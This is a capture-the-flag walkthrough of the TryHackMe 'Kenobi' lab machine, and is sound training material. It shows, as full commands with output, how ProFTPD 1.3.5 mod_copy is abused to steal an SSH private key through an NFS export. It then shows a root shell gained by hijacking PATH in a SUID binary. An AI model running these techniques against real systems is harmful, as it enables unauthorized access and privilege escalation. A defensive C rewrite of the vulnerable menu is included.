Room: https://tryhackme.com/room/kenobi
Enumeration
Port Scan (nmap)
nmap -sV -v 10.10.68.196
Running our nmap scan, we get 7 open ports back; most notably an FTP server, SSH, a web server, and Samba (SMB).
SMB Enumeration
nmap has a script to enumerate over smb, so let’s run that:
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.68.196
We get back three SMB shares: IPC$, anonymous and print$. Let's investigate the anonymous one:
# log into the anonymous share, just press enter for password
┌──(kali㉿kali)-[~/thm]
└─$ smbclient //10.10.68.196/anonymous
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
# we run ls and see a log.txt
smb: \> ls
. D 0 Wed Sep 4 06:49:09 2019
.. D 0 Wed Sep 4 06:56:07 2019
log.txt N 12237 Wed Sep 4 06:49:09 2019
9204224 blocks of size 1024. 6877112 blocks available
# log out
smb: \> exit
# and run smbget to grab that file
┌──(kali㉿kali)-[~/thm]
└─$ smbget -U anonymous smb://10.10.68.196/anonymous/log.txt
Password for [anonymous] connecting to //anonymous/10.10.68.196:
Using workgroup WORKGROUP, user anonymous
smb://10.10.68.196/anonymous/log.txt
Downloaded 11.95kB in 3 seconds
RPC Bind Enumeration
We know from our nmap scan that port 111 is running rpcbind; in our case it fronts an NFS export, so we can use nmap's NFS scripts to enumerate it as well:
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.68.196
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
So /var is exported over NFS, and the * means it is exported to any host.
Gain Access
The server is running ProFTPD, and some versions are known to be vulnerable. We can use netcat to connect and read the banner to see which version it is running:
┌──(kali㉿kali)-[~/thm]
└─$ nc 10.10.68.196 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.68.196]
And now use searchsploit to look for any exploits:
┌──(kali㉿kali)-[~/thm]
└─$ searchsploit proftpd 1.3.5
------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We have 3 exploits! They are all based around the mod_copy module, which implements the SITE CPFR (copy from) and SITE CPTO (copy to) commands and lets an unauthenticated client copy files anywhere the service can write. Earlier, we downloaded the log file from the server; reading through it, we can see that the service is running as the kenobi user and that an SSH key was generated for that user. So let's connect back to the FTP service and try to copy that SSH key into /var, the directory exported over NFS, which we can then mount in order to grab the key for ourselves.
┌──(kali㉿kali)-[~/thm]
└─$ nc 10.10.68.196 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.68.196]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
Great! Now we need to exit (Ctrl+C) and mount /var in order to grab this key:
┌──(kali㉿kali)-[~/thm]
└─$ sudo mkdir /mnt/kenobiNFS
┌──(kali㉿kali)-[~/thm]
└─$ sudo mount 10.10.68.196:/var /mnt/kenobiNFS
┌──(kali㉿kali)-[~/thm]
└─$ ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 3 root root 4096 Mar 22 11:49 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 12 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 26 2019 mail
drwxr-xr-x 2 root root 4096 Feb 26 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 29 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Mar 22 11:48 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www
We're in! Now let's grab the key from /var/tmp and use it to log in:
┌──(kali㉿kali)-[~/thm]
└─$ cp /mnt/kenobiNFS/tmp/id_rsa .
┌──(kali㉿kali)-[~/thm]
└─$ sudo chmod 600 id_rsa
┌──(kali㉿kali)-[~/thm]
└─$ ssh -i id_rsa kenobi@10.10.68.196
kenobi@kenobi:~$
And now we can cat user.txt for the flag!
PrivEsc
We have access as kenobi, but let's gain root access. Let's search for any executables with the SUID bit set:
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
One interesting one is /usr/bin/menu. If we execute it, it seems to be a custom menu interface created to run certain commands, such as checking the web interface, the kernel version or the IP address:
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
By running strings /usr/bin/menu we can see what commands it is running:
curl -I localhost
uname -r
ifconfig
None of these commands is called with an absolute path, so the SUID binary resolves them through our PATH. We could therefore modify our PATH so that one of these names points at a file we control and gain a root shell. The room does this with curl, but I am going to do it with ifconfig, because it is called without any options.
# cd to the temp directory
kenobi@kenobi:~$ cd /tmp
# create a script named ifconfig that just launches /bin/sh
kenobi@kenobi:/tmp$ echo /bin/sh > ifconfig
# make it executable
kenobi@kenobi:/tmp$ chmod 777 ifconfig
# put /tmp, which now holds our fake ifconfig, at the front of our PATH
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
# rerun the menu and choose the ifconfig option
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
# the prompt changes to '#': the SUID menu ran our script, so this is a root shell
# whoami
root
And we are in! Now let's look in root's home directory (ls /root) and read the flag (cat /root/root.txt)!
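The PATH hijack above works only because menu invokes curl, uname and ifconfig by bare name, leaving the lookup to the caller's environment. As an added example (not the room's /usr/bin/menu), here is the same three-option menu written so that PATH never decides what runs: an allowlist of absolute paths, no shell, and a hard-coded environment for the child. The tool paths are assumed Ubuntu 16.04 locations.

```c
/* Added example (not the room's /usr/bin/menu): the same three-option menu
 * written so that the caller's PATH cannot redirect it. The absolute tool
 * paths are assumptions (Ubuntu 16.04 locations); any fixed path would do. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Allowlisted actions: absolute path plus a fixed argv, so neither the
 * caller's PATH nor a shell is involved in deciding what gets executed. */
struct action { const char *label; const char *path; const char *const argv[4]; };
static const struct action actions[] = {
    { "status check",   "/usr/bin/curl",  { "curl", "-I", "localhost", NULL } },
    { "kernel version", "/bin/uname",     { "uname", "-r", NULL } },
    { "ifconfig",       "/sbin/ifconfig", { "ifconfig", NULL } },
};
#define N_ACTIONS (sizeof actions / sizeof actions[0])
/* Map the 1-based menu choice to an action; NULL for anything outside the
 * allowlist, so unexpected input runs nothing at all. */
const struct action *lookup_action(int choice)
{
    if (choice < 1 || (size_t)choice > N_ACTIONS)
        return NULL;
    return &actions[choice - 1];
}
/* execve() with an absolute path never searches PATH, and the child gets a
 * hard-coded PATH so the tool's own subprocesses cannot be hijacked either.
 * Returns the child's exit status, or -1 on fork/exec failure. */
int run_action(const struct action *a)
{
    static char *const clean_env[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(a->path, (char *const *)a->argv, clean_env);
        _exit(127);             /* exec failed: never fall back to a shell */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    int choice;
    for (size_t i = 0; i < N_ACTIONS; i++) printf("%zu. %s\n", i + 1, actions[i].label);
    printf("** Enter your choice :");
    if (scanf("%d", &choice) != 1 || !lookup_action(choice)) return 1;
    return run_action(lookup_action(choice));
}
```

With this layout a file called ifconfig in /tmp is simply never consulted, and strings on the binary shows absolute paths, which is what an auditor looking at SUID binaries wants to see.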
Machine Compendium
{
  "MACHINE_IP": "10.10.68.196",
  "MACHINE_INFO": {
    "os": "Ubuntu Linux",
    "host": "KENOBI"
  },
  "OPEN_PORTS": {
    "21": ["ftp", "ProFTPD 1.3.5"],
    "22": ["ssh", "OpenSSH 7.2p2 Ubuntu 4ubuntu2.7"],
    "80": ["http", "Apache httpd 2.4.18"],
    "111": ["rpcbind", "2-4 (RPC #100000)"],
    "139": ["netbios-ssn", "Samba smbd 3.X - 4.X"],
    "445": ["netbios-ssn", "Samba smbd 3.X - 4.X"],
    "2049": ["nfs_acl", "2-3 (RPC #100227)"]
  },
  "SMB": {
    "paths": ["\\\\10.10.68.196\\IPC$", "\\\\10.10.68.196\\anonymous", "\\\\10.10.68.196\\print$"]
  },
  "CREDENTIALS": {
  },
  "OTHER_INFO": {
    "vulnerabilities": ["ProFTPD 1.3.5"]
  }
}